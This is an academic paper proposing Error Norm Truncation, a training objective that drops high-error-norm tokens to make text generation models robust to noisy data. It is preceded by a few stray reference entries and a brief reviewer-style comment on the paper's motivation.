Tang Li, Fengchun Qiao, Mengmeng Ma, and Xi Peng. Are data-driven explanations robust against out-of-distribution data? *arXiv preprint arXiv:2303.16390*, 2023.

Thomas Liao, Rohan Taori, Inioluwa Deborah Raji, and Ludwig Schmidt. Are we learning yet? A meta review of evaluation failures across machine learning. In *Thirty-fifth Conference on Neural Information Processing Systems Datasets and Benchmarks Track (Round 2)*, 2021.

Zachary Lipton, Yu-Xiang Wang, and Alexander Smola. Detecting and correcting for label shift with black box predictors. In *International Conference on Machine Learning*, 2018.

Zixuan Liu, Ziqiao Wang, Hongyu Guo, and Yongyi Mao. Over-training with mixup may hurt generalization. *arXiv preprint arXiv:2303.01475*, 2023.
zMvMwNvs4R
Even though the results have proven the effectiveness of ENT, I think the motivation for using the error norm to estimate data quality could be discussed further, with more insight into how the two correlate.
Error Norm Truncation: Robust Training in the Presence of Data Noise for Text Generation Models

Tianjian Li, Haoran Xu, Philipp Koehn, Daniel Khashabi, Kenton Murray
Center for Language and Speech Processing
Johns Hopkins University, Baltimore MD
{tli104, hxu64}@jhu.edu

Abstract

Text generation models are notoriously vulnerable to errors in the training data. With the widespread availability of massive amounts of web-crawled data becoming more commonplace, how can we enhance the robustness of models trained on massive amounts of noisy web-crawled text? In our work, we propose Error Norm Truncation (ENT), a robust enhancement to the standard training objective that truncates noisy data. Compared to methods that only use the negative log-likelihood loss over target words to estimate data quality, our method provides a more accurate estimation by considering the distribution of non-target tokens, which is often overlooked by previous work. Through comprehensive experiments across language modeling, machine translation, and text summarization, we show that equipping text generation models with ENT improves generation quality over standard training and previous soft and hard truncation methods. Furthermore, we show that our method improves the robustness of models against two of the most detrimental types of noise in machine translation, resulting in an increase of more than 2 BLEU points over the MLE baseline when up to 50% noise is added to the data.

1 Introduction

Advances in neural text generation models have achieved remarkable success in various downstream tasks, including but not limited to machine translation (Kalchbrenner & Blunsom, 2013), summarization (Rush et al., 2015), question answering (Joshi et al., 2017), and story generation (Fan et al., 2018). The prevalent paradigm for training text generation models is maximum-likelihood estimation (MLE), which finds parameters that maximize the probability of each token from the training data conditioned on a given context. The limitation of MLE is that the model is forced to assign a non-zero probability to all tokens that appear in the training data, regardless of their quality, making the model vulnerable to errors in the training data. Existing research has demonstrated that text generation models are vulnerable to natural noise, such as misspelled and misordered words (Khayrallah & Koehn, 2018), and adversarial noise, such as poisoned training data (Wang et al., 2021a; Wallace et al., 2021; Wan et al., 2023).

To overcome this limitation, previous studies have either explored alternatives to the autoregressive MLE paradigm (Khandelwal et al., 2021; Lewis et al., 2020b; An et al., 2022) or modified the MLE objective (Welleck et al., 2020; Li et al., 2020; Kang & Hashimoto, 2020; Lin et al., 2021; Pang & He, 2021; Xu et al., 2022; Ji et al., 2023). Modifications of MLE estimate data quality using the predicted probability of the ground-truth token during training: a high probability corresponds to a higher likelihood that the ground-truth token is clean, and vice versa. Therefore, we can either directly remove data with high loss (Kang & Hashimoto, 2020; Goyal et al., 2022; Mohiuddin et al., 2022) or down-weight data with low probability (Li et al., 2021; Li et al., 2023) at each training iteration to improve robustness to data noise.

However, estimating data quality using only the predicted probability of the target token ignores the distribution of the non-target tokens.
For example, when a model assigns a low probability to a specific token, it could be the case that the context is high-entropy with many viable continuations, leading to a diluted probability of the target token (first example in Figure 1). Another possibility is that the model has not sufficiently converged and thus has not learned a reasonable distribution for this token (second example in Figure 1). In both cases, truncating this token or down-weighing the loss of this token could be harmful to model training.

Figure 1: A motivating example of using the error norm for data quality estimation. All three examples have equal loss because they assign the same probability to the ground truth token. The skewness of the distribution of non-target tokens differentiates between the case when the context has high entropy with multiple possible continuations (example 1), when the model is at the beginning of training and is incompetent in making a prediction (example 2) and the case when the data is an error (example 3). Truncating high loss removes all three examples whereas truncating high $\ell_2$ error norm only removes the third erroneous example.

To consider the predicted distribution of non-target tokens when estimating data quality, we propose Error Norm Truncation (ENT). This modified objective uses the $\ell_2$ norm of the difference between the model's predicted distribution and the one-hot vector of the ground truth to measure the quality of the data at each training iteration, and truncates data with low quality. Intuitively, our method truncates tokens to which the model not only assigns a low probability but is very confident that it should be another token (third example in Figure 1). ENT improves robustness to data noise during training by accurately estimating data quality at the token level and removing noisy tokens. To sum up, our contribution is threefold:

• We propose Error Norm Truncation: a data truncation method during training guided by a more accurate data quality estimation method that considers the probability distribution of non-target tokens;

• Through experiments under different tasks and setups, we show Error Norm Truncation consistently outperforms the MLE baseline as well as strong baselines proposed by previous methods in generation quality;

• We directly validate that Error Norm Truncation improves the robustness of machine translation models against two different types of noise: untranslated and randomly shuffled target sentences, and outperforms all previous methods that truncate data.

2 BACKGROUND AND MOTIVATION

Notation and Task Description. We consider a conditional text generation model $p_\theta(y|x)$. Given context $x$ and target sequence $y = (y_1, ..., y_T)$, the autoregressive framework models the probability of the target sequence conditioned on the context $p_\theta(y|x)$ by factorizing it into the sum of log-probabilities of individual tokens. The prediction for each time step $t$ is conditioned both on the context $x$ and the previous tokens $y_{<t}$: $$\log p_\theta(y|x) = \sum_{t=1}^{T} \log p_\theta(y_t|y_{<t}, x).$$ The context $x$ depends on the specific task: in machine translation, the context $x$ is the source sentence to be translated from; in summarization, the context $x$ is the article to be summarized. Standard language modeling can be seen as a special case where the context $x$ is empty.
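As a concrete illustration of this factorization, the sketch below computes the sequence log-probability $\log p_\theta(y|x)$ from per-token logits; the `model` interface and all names are our own assumptions, not the authors' code.

```python
import torch
import torch.nn.functional as F

def sequence_log_prob(model, x_ids, y_ids):
    """log p(y|x) = sum_t log p(y_t | y_<t, x) for an autoregressive model.

    `model(x_ids, y_prefix)` is assumed to return next-token logits of shape
    (batch, seq, vocab); the exact calling convention is model-specific.
    """
    logits = model(x_ids, y_ids[:, :-1])          # predict y_t from y_<t and x
    log_probs = F.log_softmax(logits, dim=-1)
    # Gather the log-probability assigned to each ground-truth token y_t.
    tok = log_probs.gather(-1, y_ids[:, 1:].unsqueeze(-1)).squeeze(-1)
    return tok.sum(dim=-1)                        # (batch,) sequence log-probs
```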
MLE maximizes the probability of the target sequences from a training corpus $\mathcal{D}$ by minimizing the expectation of the negative log-likelihood over the training corpus: $$L_\theta(x, y) = \mathbb{E}_{y \sim \mathcal{D}} \left[ \sum_{t=1}^{T} - \log p_\theta(y_t | y_{<t}, x) \right].$$ However, the MLE objective is not robust to noise (Ji et al., 2023), which can be observed by calculating the gradient of the MLE loss function with respect to a single token $y_t$: $$\nabla L_\theta(x, y_t) = - \frac{\nabla p_\theta(y_t | y_{<t}, x)}{p_\theta(y_t | y_{<t}, x)}.$$ When the data is incorrect and the predicted probability for the token $y_t$ (the denominator) is very small, the gradient norm $\|\nabla L_\theta(x, y_t)\|$ would be very large, resulting in a large gradient update in an undesired direction.

**Previous Works.** The vulnerability of the MLE objective to noise has cultivated research into truncating noisy data. A trivial method of estimating data quality $q(x, y)$ is to use the predicted probability $p_\theta(y | x)$. Intuitively, if the model assigns a low prediction probability to a training instance, it is more likely that the training instance is of low quality. However, in practice, a low prediction probability can also indicate a high-entropy context rather than low data quality. A natural way to mitigate this vulnerability is to remove the noisy data outright: **Loss Truncation** (Kang & Hashimoto, 2020) directly removes a fixed fraction of the training sentences with the highest loss by setting their loss to 0, given a fraction of data $c$ to prune out. The loss function for Loss Truncation is: $$L_{LT} = - \log p_\theta(y | x) \cdot \mathbb{I}(p_\theta(y | x) > \tau_{\theta,c}),$$ where $\mathbb{I}(\cdot)$ is the indicator function and $\tau_{\theta,c}$ is the threshold calculated as the $c$-th percentile of losses over the training data. Note that the threshold depends on the model's current state, since we use the model to rank training data and prune out a given percentage with the highest loss (or lowest predicted probabilities). Data truncation can also be done in a soft and fine-grained way: **TaiLr** (Ji et al., 2023) up-weighs individual tokens with higher predicted probabilities, smoothed by an interpolation between the ground truth distribution and the predicted probability of the model. The loss function \( L_{\text{TaiLr}} \) is: \[ \mathbb{E}_{y \sim \mathcal{D}} \left[ - \sum_{t=1}^{T} \left( \frac{p_\theta(y_t | y_{<t}, x)}{\gamma + (1 - \gamma) \cdot p_\theta(y_t | y_{<t}, x)} \right) \cdot \log p_\theta(y_t | y_{<t}, x) \right], \] where \( \gamma \) is a hyper-parameter for the smoothing factor. To overcome the issue of the model assigning a very small probability to all target tokens uniformly during the initial stage of training, TaiLr sets a lower threshold on the weighting factor as a hyperparameter. In our work, we consider Loss Truncation and TaiLr the most important baselines to compare against; compact sketches of both appear after the list below.

**Motivation.** We point out two limitations of estimating data quality only by training loss:

- It is sensitive to the training iteration at which we start to estimate data quality and remove or down-weight low-quality data.

- It ignores the rich information contained in the probability distribution of the incorrect (non-target) tokens, treating high and low entropy contexts as equal.
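For concreteness, here are minimal per-batch sketches of the two baselines above; the quantile-based thresholding, the `floor` parameter, and all names are our simplifications of the published methods, not the authors' implementations.

```python
import torch

def loss_truncation(nll, c=0.1):
    """Loss Truncation sketch: zero out the fraction `c` of examples with the
    highest negative log-likelihood (here thresholded within the batch)."""
    tau = torch.quantile(nll, 1.0 - c)          # (1 - c)-quantile of the losses
    return nll * (nll <= tau).float()           # keep only low-loss examples

def tailr_weighted_nll(nll, p_target, gamma=0.1, floor=0.2):
    """TaiLr sketch: down-weight tokens with low predicted probability using
    w = p / (gamma + (1 - gamma) * p), clipped below by a lower bound."""
    w = p_target / (gamma + (1.0 - gamma) * p_target)
    return nll * w.clamp(min=floor).detach()    # weights carry no gradient
```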
The first limitation arises because the model, when trained from scratch, undergoes multiple rounds of memorizing and forgetting (Toneva et al., 2019; Jiang et al., 2021; Jagielski et al., 2023) of individual examples. When a certain example is memorized, the model will label it as high quality, and vice versa. This leads to high variance in measuring data quality throughout different stages of training. To overcome this issue, Loss Truncation first trains the model for a pre-defined number of iterations and then uses it to do quality estimation. TaiLr uses a pre-defined lower bound on the weighting factor. However, these methods require extensive hyper-parameter tuning due to the high variance, especially when estimating quality within a mini-batch at an arbitrary training iteration. The second limitation arises because the negative log-likelihood loss ignores the skewness of the probability distribution over non-target tokens. For example, when the model assigns a low probability to the ground truth token 'house', it might have distributed the majority of the probability mass to the synonyms 'building', 'hotel' and 'mansion'. There exist multiple correct predictions for a given context (Ott et al., 2018; Khayrallah et al., 2020), and only using the probability of one token to indicate quality leads to misjudgment.

### 3 ERROR NORM TRUNCATION

Motivated by methods in dataset pruning (Paul et al., 2021), we propose to estimate data quality using the \( \ell_2 \) norm of the difference vector between the model's predicted distribution \( p_\theta(\cdot | y_{<t}, x) \) and the ground-truth one-hot distribution \( \text{OH}(y_t) \): \[ q(y_t, x) = \| p_\theta(\cdot | y_{<t}, x) - \text{OH}(y_t) \|_2, \] which we refer to as the **error norm**. \( \text{OH}(y_t) \) is a vector with all zeros except the entry at \( y_t \), which is one. At each training iteration, we set a threshold as a hyper-parameter and hard-prune the tokens with an error norm above the threshold. The loss function for Error Norm Truncation (ENT) is:[^1] \[ L_{\text{ENT}} = \mathbb{E}_{y \sim \mathcal{D}}[- \log p_\theta(y | x) \cdot \mathbb{I}(q(y_t, x) < \tau_{\theta,c})]. \] The \( \ell_2 \) error norm presents a joint solution to the two aforementioned limitations due to one observation: **the probability distribution of the incorrect tokens only becomes skewed after multiple iterations of training.** Initially, when the model does not have enough knowledge to make a prediction, the error norm for all data is close to 1, indicating that our model uniformly assigns probabilities to all target tokens. After multiple iterations of training, when the model has enough knowledge, the error norm of data noise becomes significantly larger. Figure 3 illustrates the state transition of the model from warming up to being able to make an estimate of data quality, corresponding to the horizontal red line at around training iteration 500. Setting a threshold on error norm allows the model to learn from all the data during the initial stage in order to make an educated estimate of data quality.

[^1]: We provide PyTorch-style pseudocode of Error Norm Truncation in Appendix D.
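Since the pseudocode itself lives in Appendix D, here is a rough PyTorch-style reconstruction of the thresholded objective above; names, shapes, and the default threshold are our assumptions.

```python
import torch
import torch.nn.functional as F

def ent_loss(logits, targets, threshold=1.0):
    """Error Norm Truncation sketch: drop tokens whose l2 error norm
    q(y_t, x) = ||p_theta(.|y_<t, x) - OH(y_t)||_2 exceeds `threshold`.

    logits: (batch, seq, vocab) next-token logits; targets: (batch, seq) ids.
    """
    probs = F.softmax(logits, dim=-1)
    onehot = F.one_hot(targets, probs.size(-1)).to(probs.dtype)
    error_norm = (probs - onehot).norm(p=2, dim=-1)          # (batch, seq)
    nll = F.cross_entropy(logits.transpose(1, 2), targets,
                          reduction="none")                  # (batch, seq)
    mask = (error_norm < threshold).to(nll.dtype)            # indicator I(q < tau)
    return (nll * mask).sum() / mask.sum().clamp(min=1)
```

Early in training, near-uniform predictions keep every error norm close to 1, so a threshold slightly above 1 lets the model warm up on all tokens before any truncation takes effect, matching the behavior described above.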
**Theoretical Connections.** As Kang & Hashimoto (2020) point out, a measure of the difference between probability distributions that is more robust to noise than the standard KL-divergence (KLD) (Kullback & Leibler, 1951) is the Total Variation Distance (TVD) (van Handel, 2016), defined as the supremum of the difference in probability assigned to the same event. Intuitively, TVD measures the distinguishability between two distributions. Given two probability distributions \( p \) and \( q \) over all possible sequences \( Y \), the TVD between them is: \[ \text{TVD}(p, q) = \sup_{y \in Y} |p(y) - q(y)|. \] Li et al. (2023) factorizes the sequence-level TVD to the token level and proves that the token-level TVD is an upper bound of the sequence-level TVD; therefore minimizing the token-level TVD makes the model more robust to noise in the data. We show connections between the error \( \ell_2 \) norm, the token-level TVD and the KL-divergence. By Pinsker's inequality, we have[^2] \[ \frac{1}{2} \|p_\theta - \text{OH}(y_t)\|_2 \leq \frac{1}{2} \|p_\theta - \text{OH}(y_t)\|_1 = \sup_{y \in V} |p_\theta(y) - \text{OH}(y_t)| \leq \sqrt{\frac{1}{2} \text{KLD}(p_\theta \| \text{OH}(y_t))}. \] We see that the error \( \ell_2 \) norm is a lower bound of the estimator of the token-level TVD. Examples with a high error norm indicate a higher total variation distance, whereas examples with high loss (KLD) do not necessarily indicate a high TVD, since the KLD is only a loose (Canonne, 2023) upper bound. Therefore, truncating examples with high error norms removes noisy data that has a higher TVD with the model's prediction learned from other instances.

[^2]: For simplicity, we rewrite the distribution of predicted probabilities \( p_\theta(\cdot | y_{<t}, x) \) as \( p_\theta \).

4 CASE STUDIES

Error Norm clearly distinguishes between clean and noisy tokens. It is well established in robust statistics that the \( \ell_2 \) error norm is more sensitive to outliers (Hastie et al., 2001) than the \( \ell_1 \) norm, so the \( \ell_2 \) norm is better at detecting outliers in data than the \( \ell_1 \) norm. We prove the equivalence of using the error \( \ell_1 \) norm and the standard loss for ranking data quality in Appendix A. To empirically show the superiority of the \( \ell_2 \) norm in distinguishing between clean and noisy tokens, we use the dataset from Kang & Hashimoto (2020), which contains 300 examples from the Gigaword text summarization dataset where each summary is annotated into two categories: 1) directly entailed and 2) contains facts that cannot be inferred from the context. We find the precise tokens that are not entailed by the input and label them as hallucinated, and label all the other tokens as clean. We plot the normalized histograms of negative log-likelihood loss and error norm for clean and hallucinated tokens in Figures 4a and 4b, evaluated by a pre-trained BART-large model. The overlap between the clean and noisy distributions of loss (shaded area in Figure 4a) is larger than the overlap of error norm (shaded area in Figure 4b), indicating that error norm distinguishes between clean and noisy examples more clearly than negative log-likelihood loss.

Error Norm provides a more accurate measure of data quality. We directly verify that our method provides a more accurate estimate of data quality. We plot the BLEU scores of multilingual machine translation for 4 directions, En-{De, Fr, It, Es}, with a fixed fraction of sentences pruned out according to different metrics in Figure 5. ENT matches the performance of the baseline at small pruning fractions (10%-20%) while exhibiting the smallest performance drop at high pruning fractions, outperforming random pruning by 2.43 BLEU and outperforming Loss Truncation by 0.88 BLEU when 60% of the data is pruned out. This shows that Error Norm provides a more accurate estimate of data quality than negative log-likelihood loss.
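The ranking equivalence is easy to see for a one-hot target: \( \|p_\theta - \text{OH}(y_t)\|_1 = 2(1 - p_\theta(y_t)) \), a monotone function of the negative log-likelihood, so the \( \ell_1 \) norm and the loss sort tokens identically, while the \( \ell_2 \) norm additionally depends on how the remaining mass is spread. The toy numbers below (ours, not from the paper) replay the three cases of Figure 1:

```python
import numpy as np

V, t = 10, 0                          # vocab size, ground-truth token index
onehot = np.eye(V)[t]
cases = {
    "untrained (near-uniform)": np.full(V, 0.1),
    "high-entropy context":     np.array([0.1, 0.3, 0.3, 0.3] + [0.0] * 6),
    "data error (confident)":   np.array([0.1, 0.9] + [0.0] * 8),
}
for name, p in cases.items():
    nll = -np.log(p[t])               # identical (2.30) for all three cases
    l1 = np.abs(p - onehot).sum()     # = 2 * (1 - p[t]), also identical (1.80)
    l2 = np.linalg.norm(p - onehot)   # 0.95 < 1.04 < 1.27: flags only the error
    print(f"{name:25s} nll={nll:.2f} l1={l1:.2f} l2={l2:.2f}")
```

Only the \( \ell_2 \) error norm separates the genuinely erroneous token from the two benign low-probability cases.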
5 EXPERIMENTS

In this section, we show that truncating tokens with high error norm improves generation quality across different tasks. We describe the setup for all of our experiments in §5.1. We validate that our method improves robustness under synthetic noise in §5.2. We present our experimental results under the train-from-scratch setting in §5.3 and under the fine-tuning setting in §5.4. We include results of both truncating a fixed fraction of data (ENT-Fraction) and truncating according to a pre-defined threshold (ENT-Threshold). Detailed dataset statistics and hyper-parameters are in Appendix C.

5.1 SETUP

Robustness Experiments. To directly verify that ENT improves robustness, we inject noise into 1M parallel sentences of En-Fr data from the opus-100 dataset. We select two of the most harmful types of noise (Khayrallah & Koehn, 2018): Untranslated Text, where the source sentence is directly copied to the target side, and Misordered Words, where the words on the target side are randomly shuffled. We vary the amount of noise added to the corpus over {10%, 20%, 30%, 40%, 50%} of the size of the original clean corpus and report the BLEU scores of models trained with MLE equipped with Loss Truncation, TaiLr and ENT-Fraction on the perturbed datasets.

Train-from-Scratch. We evaluate our method on machine translation and general language modeling. For multilingual translation, we train a single model for eight directions en-{es, fa, fr, it, ko, ru, tr, zh} from the opus-100 corpus[^3] (Zhang et al., 2020) using 1M parallel sentences for each direction. We train on the fairseq (Ott et al., 2019) implementation of the standard Transformer (Vaswani et al., 2017) architecture[^4] for all of our machine translation experiments. For language modeling, we train a GPT2-large (Radford et al., 2019) model on the WikiText-103 dataset (Merity et al., 2017) for 5 epochs from scratch. We use the Huggingface (Wolf et al., 2020) implementation of GPT2-large.

[^3]: https://opus.nlpl.eu/opus-100.php
[^4]: transformer_iwslt_de_en

**Fine-Tuning.** We validate our method on the CNN/Daily Mail text summarization dataset (See et al., 2017; Hermann et al., 2015) with two different models, T5-small (Raffel et al., 2020) and BART-base (Lewis et al., 2020a), to validate that our method generalizes across different pre-trained models. We use the Huggingface implementations of T5 and BART.

### 5.2 ROBUSTNESS RESULTS

**Untranslated Text.** Table 1 shows the BLEU results of machine translation models trained on corpora with different levels of untranslated text injected. Since the corpus is high-quality data from the opus-100 training set, the difference between the various methods that aim to improve robustness to noise is small when no noise is added. The MLE baseline's scores gradually decrease with increased injection, revealing the negative impact of untranslated sentences. Loss Truncation maintains similar BLEU scores, and TaiLr exhibits modest gains in both metrics. Notably, Error Norm Truncation consistently improves performance at higher injection percentages, outperforming the baseline by 3.8 BLEU and the best of Loss Truncation and TaiLr by 2.1 BLEU when 50% noise is injected. These results emphasize the challenge of handling untranslated content, with Error Norm Truncation proving exceptionally effective in mitigating this issue and enhancing translation quality.
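The two perturbations in §5.2 are straightforward to reproduce; the following sketch is our reconstruction of the protocol, not the authors' script, and all names are hypothetical.

```python
import random

def inject_noise(pairs, kind, frac, seed=0):
    """Append synthetic noise to a list of (source, target) sentence pairs.

    kind='untranslated': copy the source sentence to the target side;
    kind='misordered':   randomly shuffle the words of the target sentence.
    `frac` is the noise size relative to the original clean corpus.
    """
    rng = random.Random(seed)
    noisy = []
    for src, tgt in rng.sample(pairs, int(frac * len(pairs))):
        if kind == "untranslated":
            noisy.append((src, src))
        else:
            words = tgt.split()
            rng.shuffle(words)
            noisy.append((src, " ".join(words)))
    return pairs + noisy
```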
**Misordered Words.** Table 2 shows the BLEU results of models trained on data with misordered sentences injected on the target side. Our results echo the findings of Khayrallah & Koehn (2018), showing that randomly shuffling the target sentence is a weaker type of noise compared to directly copying the source text to the target. Although Loss Truncation was able to improve upon the baseline when a small amount of noise is added (10-20%), it performs the same as standard MLE training when a larger amount of misordered sentences is added to the training data. ENT is the most resilient method against misordered words on the target side, yielding the largest BLEU score improvements over the baseline at all noise levels. It outperforms the baseline by 0.9 BLEU when 50% randomly shuffled sentences are injected and falls only 0.1 BLEU short of standard training on clean data, indicating the model's resilience against randomly shuffled target sentences when equipped with ENT.

| Untranslated | 0% | 10% | 20% | 30% | 40% | 50% |
|--------------|------|------|------|------|------|------|
| MLE | 36.5 | 34.9 | 33.2 | 30.6 | 31.0 | 28.6 |
| Loss Trunc. | 36.5 | 33.2 | 32.5 | 31.5 | 31.4 | 29.4 |
| TaiLr | 36.6 | 34.3 | 33.4 | 31.5 | 31.6 | 30.3 |
| ENT-Fraction | **36.7** | **33.3** | **33.8** | **33.3** | **33.1** | **32.4** |

Table 1: BLEU scores of models trained on opus-100 En-Fr data injected with the source sentence directly copied to the target side (Untranslated Text), ranging from 10% to 50% of the original clean data. Truncating with error norm is the most robust method against untranslated sentences.

| Misordered | 0% | 10% | 20% | 30% | 40% | 50% |
|------------|------|------|------|------|------|------|
| MLE | 36.5 | 36.1 | 36.1 | 36.2 | 35.8 | 35.5 |
| Loss Trunc.| 36.5 | 36.1 | 36.1 | 36.2 | 35.8 | 35.7 |
| TaiLr | 36.6 | 36.2 | 36.2 | 36.3 | 36.2 | 36.2 |
| ENT-Fraction | **36.7** | **36.3** | **36.7** | **36.7** | **36.5** | **36.4** |

Table 2: BLEU scores of models trained on opus-100 En-Fr data injected with parallel sentences randomly shuffled (Misordered Words) on the target side, ranging from 10% to 50% of the original clean data. Truncating with error norm improves upon the baseline the most compared to existing methods.

### 5.3 TRAIN-FROM-SCRATCH RESULTS

**Language Modeling.** We first evaluate our method on general language modeling. Table 3 shows the validation perplexity of pre-training a GPT-2 Large model on WikiText-103 from scratch. Hard truncation methods (Loss Truncation and Error Norm Truncation) lower the perplexity by more than 1 point compared to the MLE baseline. Truncating with error norm outperforms truncating with loss for a fixed fraction, and truncating to a given threshold outperforms all existing methods, lowering perplexity by 1.58 compared to the MLE baseline.

| | MLE | Loss Truncation | TaiLr | ENT-Fraction | ENT-Threshold |
|----------------|-------|-----------------|-------|--------------|---------------|
| PPL. ↓ | 25.88 | 24.64 | 25.62 | 24.50 | **24.30** |

Table 3: Validation perplexity on WikiText-103 of pre-training a GPT2-large model with different data truncation methods. Truncating with error norm outperforms the MLE baseline by 1.38 perplexity, while truncating to a given threshold further improves the performance by 0.2 points in perplexity.
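The two ENT variants compared above differ only in how the cutoff is chosen; a minimal sketch of the distinction (our own formulation, with a per-batch quantile standing in for the corpus-level percentile) is:

```python
import torch

def ent_mask(error_norm, mode="threshold", tau=1.0, frac=0.1):
    """Token-keep mask for the two ENT variants.

    ENT-Threshold keeps tokens whose error norm is below a fixed `tau`;
    ENT-Fraction drops the `frac` of tokens with the highest error norm
    (here the cutoff is taken as a per-batch quantile).
    """
    if mode == "fraction":
        tau = torch.quantile(error_norm.flatten(), 1.0 - frac)
    return (error_norm < tau).float()
```

ENT-Threshold needs no warm-up schedule, since early near-uniform predictions keep all error norms close to 1 and hence below a threshold chosen slightly above 1.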
To show that Error Norm Truncation is less sensitive to the iteration from which soft or hard data truncation methods are applied, we vary this iteration over \( \{0, 100, 200, 500, 1000\} \) parameter updates and plot the validation perplexity on WikiText-103 of the different methods in Figure 6. We see that ENT-Fraction outperforms previous methods while having the lowest variance, and ENT-Threshold further improves the performance over ENT-Fraction. We highlight that large-scale language model pre-training is too expensive to try out a combinatorially large number of hyper-parameters; therefore, our method is more scalable to large-scale pre-training tasks than other methods, due to its low variance and high performance.

**Machine Translation.** Table 4 shows the BLEU results on multilingual machine translation, where 1M parallel sentences for each language pair from a set of linguistically diverse languages are concatenated for training a large model. We find that previous methods often underperform the MLE baseline due to not capturing the model's competency while truncating, whereas our method consistently outperforms the baseline. Our method also outperforms Loss Truncation in 6 out of 8 directions, given a fixed pruning fraction.

| En-{ } | Es | Fa | Fr | It | Ko | Ru | Tr | Zh | Avg. |
|--------|----|----|----|----|----|----|----|----|------|
| MLE | 40.5 | 14.2 | 40.4 | 35.1 | 10.1 | 36.3 | 25.0 | 39.2 | 30.1 |
| Loss Truncation | 39.8 | 14.0 | 40.1 | 34.4 | 9.9 | 36.5 | 24.7 | **40.1** | 29.9 |
| TaiLr | 40.4 | 14.0 | 40.2 | 35.1 | 10.0 | 36.1 | 25.2 | 39.6 | 30.1 |
| ENT-Fraction | 41.1 | 14.8 | 40.3 | **35.2** | **10.3** | 36.4 | 25.0 | 39.6 | 30.3 |
| ENT-Threshold | **41.9** | **14.9** | **41.0** | 34.8 | 10.2 | **36.5** | **25.5** | 39.8 | **30.6** |

Table 4: BLEU results on a linguistically diverse subset of the opus-100 dataset. Error Norm Truncation with threshold and fraction outperforms the baseline and Loss Truncation in 7 out of 8 directions.

5.4 FINE-TUNING RESULTS

**Summarization.** Table 5 shows the results of fine-tuning T5-small and BART-base on the CNN/Daily Mail summarization dataset. Since we can rely on the pre-trained model to make an estimate of the data quality, we do not need to pre-define a threshold for the model; directly pruning out a fraction of data produces the best result in this case. Again, we observe that truncating with error norm outperforms all other methods on T5-small and matches their performance on BART-base.

| | T5-small | | | BART-base | | |
|------------------|-------|-------|-------|-------|-------|-------|
| | R-1 | R-2 | R-L | R-1 | R-2 | R-L |
| MLE | 42.19 | 19.69 | 39.04 | 43.50 | 20.59 | 40.36 |
| Loss Truncation | 42.22 | 19.68 | 39.05 | 43.22 | 20.66 | 40.44 |
| TaiLr | 41.53 | 19.22 | 38.33 | 42.20 | 19.66 | 39.07 |
| ENT-Fraction | **42.63** | **19.98** | **39.57** | 43.48 | 20.29 | **40.72** |
| ENT-Threshold | 42.37 | 19.80 | 39.27 | 43.35 | 20.30 | 40.54 |

Table 5: Best validation ROUGE-1/2/LSum results of fine-tuning T5-small and BART-base equipped with different robust modifications to MLE on the CNN/Daily Mail dataset. ENT outperforms baselines on T5-small and matches the performance of baselines on BART-base.

6 RELATED WORKS

**Modifications to MLE for Text Generation.** As the MLE objective is not robust to noise, numerous works have proposed ways to modify it. Welleck et al. (2020) proposes to augment the MLE objective by penalizing the model for generating undesired outputs.
Xu et al. (2022) directly penalizes the model for generating repetitions. Lin et al. (2021) modifies the gradient to encourage the model to generate diverse text. Kang & Hashimoto (2020) truncates a given fraction of the data with the highest loss to remove noise from the data. Pang & He (2021) reformulates text generation as an off-policy and offline reinforcement learning problem, assigning weights to each token according to a pre-defined reward function. Similarly, Ji et al. (2023) also reweighs each token from the training dataset by the prediction probability of the model, smoothed by an interpolation between the one-hot probability vector and the predicted probability vector. Li et al. (2020) points out that the standard MLE objective treats all incorrect tokens as equal, and proposes to learn a prior distribution over the tokens using the training data and to smooth the one-hot ground truth distribution into a Gaussian distribution over tokens with similar embeddings. Welleck et al. (2023) proposes to first generate an intermediate output using MLE and then iteratively refine the generation. To the best of our knowledge, our work is the first to address the limitations of relying only on the output probabilities for estimating data utility.

**Measuring Data Utility in NLP.** Numerous works have proposed methods to estimate the contribution of each single data point in Natural Language Processing. For text generation tasks, data quality estimates can be as simple as handcrafted heuristics such as word frequency and sequence length (Platanios et al., 2019), the relative position of a word in a sentence (Liang et al., 2021; Jia et al., 2023), or the similarity to a target domain (Moore & Lewis, 2010; Zhang et al., 2019). Besides handcrafted heuristics, model generations (Wettig et al., 2024; Liu et al., 2024) and model signals (loss, gradient, and representations) can also be utilized to measure data quality. Koh & Liang (2017) imports Influence Functions (Cook & Weisberg, 1975) from statistical theory to deep learning, measuring the utility of each training example by the difference between the parameters of the model trained with and without that particular training example. However, this estimation requires the computation of single-sample gradients, which is impractical when the training dataset is large. Paul et al. (2021) shows that the influence on the training loss of removing one particular training example is upper bounded by the gradient norm when trained on that example, and proposes to approximate the single-sample gradient norm by the error \(\ell_2\) norm. All of the above methods assume that data utility is static. Our work differs in that our method takes the training dynamics into account while making quality estimations. For a comprehensive survey on data selection for NLP, we refer the readers to Albalak et al. (2024). Additional related works on measuring data utility with model signals and discussions of Influence Functions are provided in Appendix B.

7 CONCLUSION AND LIMITATIONS

**Conclusion.** Our work proposes Error Norm Truncation (ENT), a robust modification to the standard MLE objective for training text generation models. ENT measures the quality of each token by considering the skewness of the predicted distribution and truncates noisy tokens during training. ENT demonstrates enhanced stability and superior performance over existing methods.

**Limitations.**
We acknowledge that the improvements of our method stem from noise in the distribution of the training data; therefore, the improvements on clean, curated data might not be as large. We leave more coarse-grained grouped-data and dataset-level quality estimation for future work.

REFERENCES

Julius Adebayo, Melissa Hall, Bowen Yu, and Bobbie Chern. Quantifying and mitigating the impact of label errors on model disparity metrics. In *The Eleventh International Conference on Learning Representations*, 2023. URL https://openreview.net/forum?id=RUzSobdYyOV.

Alon Albalak, Yanai Elazar, Sang Michael Xie, Shayne Longpre, Nathan Lambert, Xinyi Wang, Niklas Muennighoff, Bairu Hou, Liangming Pan, Haewon Jeong, Colin Raffel, Shiyu Chang, Tatsunori Hashimoto, and William Yang Wang. A survey on data selection for language models, 2024.

Chenxin An, Jiangtao Feng, Kai Lv, Lingpeng Kong, Xipeng Qiu, and Xuanjing Huang. Cont: Contrastive neural text generation. *arXiv preprint arXiv:2205.14690*, 2022. URL https://arxiv.org/abs/2205.14690.

